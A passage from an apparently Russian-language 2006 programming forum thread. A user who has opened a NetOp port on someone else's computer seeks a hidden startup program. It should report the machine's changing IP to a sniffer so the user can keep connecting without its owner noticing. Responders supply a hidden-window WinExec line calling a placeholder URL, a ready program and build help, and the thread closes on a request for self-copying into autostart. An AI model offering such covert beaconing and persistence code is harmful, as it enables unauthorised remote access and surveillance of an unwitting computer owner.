toper
Гость
|
|
« : 16-02-2006 11:44 » |
|
К примеру мне надо сделать, чтоб когда я запускал свой комп, автоматом у меня грузилась одна страничка, но только так чтоб я этого не видел. Тоесть чтоб практически не замечал этого... Я нашел себе альтернативный способ. Просто засунул в автозапуск html, но у меня открывается броузер и просматривает тот html что мнен надо. А как сделать чтоб броузер или чтото другое попадало на этот html, но не высвечивалось и не открывалось... С уважением Toper!
|
|
|
|
|
|
|
PooH
Глобальный модератор
|
|
« Ответ #1 : 16-02-2006 11:59 » |
|
а смысл? напиши программу и обращайся по HTTP к нужному URL
|
|
|
|
Удачного всем кодинга! -=x[PooH]x=-
|
|
|
toper
Гость
|
|
« Ответ #2 : 16-02-2006 12:17 » |
|
а смысл? напиши программу и обращайся по HTTP к нужному URL Как писать и что для этог надо? Я просто в этом не бум-бум
|
|
|
|
|
|
|
PooH
Глобальный модератор
|
|
« Ответ #3 : 16-02-2006 13:13 » |
|
что для этог надо? нужно быть бум-бум ты расскажи, для чего это надо - мож другой способ найдем
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #4 : 16-02-2006 13:32 » |
|
ты расскажи, для чего это надо - мож другой способ найдем Да, ты прав всетаки... В общем расказываю в чем заключается потребность. Открыл порт на удаленном компе. Если я знаю ip этого компа, то я могу подключаться к нему. Порт открыт прогой NetOP. У того компьютера 1 раз в день меняется ip адресс. Порт у него остается все тот же самый 6502, который я открыл. Дык вот я поставил на одном сайте снифер, для того чтоб он при загрузке компа заходил на этот снифер и передавал ip адрес в log файл. Потом я просто иду в лог и смотрю ip. Поключаюсь к нему и доволен жизнью. Может быть есть еще другие способы узнать динамический ip адресс? Может есть какойто способ чтоб комп автоматом мне еще его передовал... Зарание благодарен!!!!
|
|
|
|
|
|
|
PooH
Глобальный модератор
|
|
« Ответ #5 : 16-02-2006 14:58 » |
|
Удаленный комп перезагружается перед сменой IP? Я так понимаю он в нет ходит не через прокси?
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #6 : 16-02-2006 15:02 » |
|
PooH, Не, у него стоит простой роутер. У него ip сам меняется на роутере 1 раз в день. Свой комп он перезагружает примерно раз 10 в день...
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #7 : 17-02-2006 13:02 » |
|
Есть ли какие нибудь предложения?
|
|
|
|
|
|
|
PooH
Глобальный модератор
|
|
« Ответ #8 : 17-02-2006 13:11 » |
|
Довольно сложная задача... думаю.
Как вариант в XP можно страницу открывать прям на десктопе (в свойствах экрана).
А зачем нужно " но только так чтоб я этого не видел"? Устроит, если программка запустится и потом сама закроется?
Возможно, если руки дойдут накатаю тебе прогу: там на 20-30 минут делов - чтоб она к сайту обратилась и закрылась. Напомни на след. неделе (лучше в личку)
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #9 : 17-02-2006 13:13 » |
|
PooH, Да, программа бы устроила. Я бы ее просто прописал ее в автозапуск и все... Только чтоб она не сильно моячила перед глазами пользователя... А то заподозрит и начнет разбираться почему у него окошко кокоето вылазиет... Спасибо большое...!
|
|
|
|
|
|
|
zubr
Гость
|
|
« Ответ #10 : 18-02-2006 07:32 » |
|
toper, все что тебе надо можно сделать одной строкой кода: WinExec("C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE http://MyURL/MyFile.html", SW_HIDE); Путь к IEXPLORE.EXE и URL должны быть твои.
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #11 : 18-02-2006 09:17 » |
|
zubr, Куда это прописывать? P.s. Спасибо!
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #12 : 18-02-2006 09:26 » |
|
В этом случае было бы C:\Program Files\Internet Explorer\IEXPLORE.EXE
|
|
« Последнее редактирование: 19-02-2006 19:10 от toper »
|
|
|
|
|
PooH
Глобальный модератор
|
|
« Ответ #13 : 18-02-2006 12:43 » |
|
zubr, да, только еще и саму программу которая этот код запустит надо спрятать, да и будет висеть процесс iexplore... а зачем они нужны... лучше уж использовать InternetOpen, InternetOpenURL и т.д...
|
|
|
|
|
|
|
zubr
Гость
|
|
« Ответ #14 : 18-02-2006 14:54 » |
|
PooH, программка то практически сразу закроется, запустив IE, да и как я понял из вопроса: Я нашел себе альтернативный способ. Просто засунул в автозапуск html, но у меня открывается броузер и просматривает тот html что мнен надо. А как сделать чтоб броузер или чтото другое попадало на этот html, но не высвечивалось и не открывалось эти моменты не критичны. toper, в аттачменте интересующая вас программка.
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #15 : 19-02-2006 09:35 » |
|
zubr, Супер, Больше спасибо! Это именно то что мне надо было!!! PooH, Тебе тоже спасибо за дельные советы!
А теперь если можно, обьясните что да как сделали, на случай если линк поменяется, то нужно будет его изменить в exe-шнике...
|
|
|
|
|
|
|
zubr
Гость
|
|
« Ответ #16 : 19-02-2006 11:34 » |
|
Есть несколько вариантов: 1. Перекомпилировать программку с нужным линком. Для этого укажите среду разработки какая у вас есть (VC, Delphi, C++Builder), или установите, я пришлю исходный код, в котором будет меняться текст линка. 2. Помещать какой нибудь текстовый файл, в котором будет указан линк, к примеру, в папку Windows или системную папку. В этом случае укажите имя файла (оно может быть произвольным, расширение тоже произвольное) и место где он будет лежать.
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #17 : 19-02-2006 11:38 » |
|
zubr, Было бы неплохо переконпелировать. Я сейчас поставлю какойто язык, а ты сможешь мне дать исходник? Кстати, какой лучше всего язык ставить? С++ ?
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #18 : 19-02-2006 11:54 » |
|
В общем скачал Borland C++ Builder v6.0, жду дальнейших указаний!
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #19 : 19-02-2006 18:13 » |
|
zubr, Если можно, дай пожалуйста весь полный исходной код для С++ Зарание спасибо!!!
|
|
|
|
|
|
|
zubr
Гость
|
|
« Ответ #20 : 19-02-2006 18:48 » |
|
Лови проект, правда на C++Builder 5, но думаю на 6-ом должно работать.
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #21 : 19-02-2006 19:14 » |
|
zubr, Спасибо большое! Подошло однозначно!!! Надо теперь только изменить и компельнуть в exe как я понял... Спасибо еще раз!
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #22 : 19-02-2006 19:18 » |
|
zubr, А где в 6.0 компилить? Я что-то не нашел..
|
|
|
|
|
|
|
zubr
Гость
|
|
« Ответ #23 : 20-02-2006 04:30 » |
|
1. В меню File->Open загружаешь файл AutorunUrl.bpr - это загрзится проект. 2. В меню Project->Build AutorunUrl компилируешь экзешник.
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #24 : 20-02-2006 09:51 » |
|
Вот что он мне в этом случае пишет. Типа какой-то покет не нашел... В чем может быть проблема?
Fatal: Unable to open file 'VCLSHXV1C5.BPI'
|
|
« Последнее редактирование: 20-12-2007 14:50 от Алексей1153++ »
|
|
|
|
|
zubr
Гость
|
|
« Ответ #25 : 20-02-2006 17:20 » |
|
Мда, проблема в версиях. Попробуй сам создать консольный проект: 1. В меню File->New вызови панель NewItems 2. В данной панели выбери Console Wizard 3. В диалоговом окне Console Wizard отключи (если включено) Console Application 4. Вставь код из моего проекта в новый проект 5. Сохрани проект 6. Скомпилируй проект. З.Ы. К сожалению 6-го Builder у меня нет, есть VC++6, Delphi5-7, C++Builder5
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #26 : 20-02-2006 19:31 » |
|
zubr, Сделал все как ты мне сказал в точности до милиметра. При компиляции выводит вот такую вот бяку [Компоновщик Ошибка] Unresolved external '__InitVCL' referenced from C:\PROGRAM FILES\BORLAND\CBUILDER6\LIB\CP32MTI.LIB|crtlvcl [Компоновщик Ошибка] Unresolved external '__ExitVCL' referenced from C:\PROGRAM FILES\BORLAND\CBUILDER6\LIB\CP32MTI.LIB|crtlvcl
Есть еще варианты действий ?
|
|
« Последнее редактирование: 20-12-2007 14:51 от Алексей1153++ »
|
|
|
|
|
zubr
Гость
|
|
« Ответ #27 : 20-02-2006 20:02 » |
|
В диалоговом окне Console Wizard должно быть включено только C++, проверь. Если не поможет то найди любую из сред разработки, имеющихся у меня (VC++6, Delphi5-7, C++Builder5).
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #28 : 20-02-2006 20:39 » |
|
zubr, О!!! Теперь нормально компельнулось. Тама просто в визарде надо было другие галочки тоже поубирать как ты сказал. Спасибо большое!!! Работает на УРА!!!
|
|
|
|
|
|
|
toper
Гость
|
|
« Ответ #29 : 20-02-2006 20:48 » |
|
zubr, И еще вопрос..., а как сделать чтоб после запуска файла AutorunURL.exe, он перекидывался бы в папку автозапуска? Зарание Благодарен!
|
|
|
|
|
|
|
|